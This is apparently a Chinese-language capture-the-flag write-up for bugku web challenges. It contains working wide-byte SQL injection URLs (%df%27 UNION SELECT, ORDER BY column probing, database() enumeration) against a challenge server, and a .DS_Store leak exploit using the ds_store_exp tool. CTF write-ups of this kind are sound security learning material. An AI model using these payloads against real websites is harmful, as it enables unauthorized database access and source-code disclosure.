1. 程式人生 > >bugku writeup web

bugku writeup web

sql注入

先可以通過burp來發現是gbk編碼,可以得知可能存在寬位元組注入

既然有提示,那麼就按照提示來

查詢key表,id=1的string欄位

構造payload

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key%23

得到flag~~~~

有趣的是

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from key where table_schema=database()%23
http://103.238.227.13:10083/?id=1%df%27

union select 1,string from key where table_schema=database() and table_name=key%23

這倆居然是爆不出來的= =

表非得是sql5.key,直接 from key是爆不出來的,所以得先爆出庫名

http://103.238.227.13:10083/?id=1%df%27 union select 1,database()%23

在此之前得先知道有幾列

http://103.238.227.13:10083/?id=1%df%27 order by 2%23

由此得出有兩列hhh

**

sql注入2

**
這題有點迷。。。。一上來就是登陸框,嘗試各種注入,無果。
參考了大牛們的部落格,才曉得是原始碼洩露

先了解些概念:

.DS_Store檔案洩漏
漏洞成因:
在釋出程式碼時未刪除資料夾中隱藏的.DS_store,被發現後,獲取了敏感的檔名等資訊。
漏洞利用:
http://www.example.com/.ds_store
注意路徑檢查
工具:
dsstoreexp
python ds_store_exp.pyhttp://www.example.com/.DS_Store

所以,直接cmd
這裡寫圖片描述

直接開啟web2目錄下的flag即可,得到flag~~~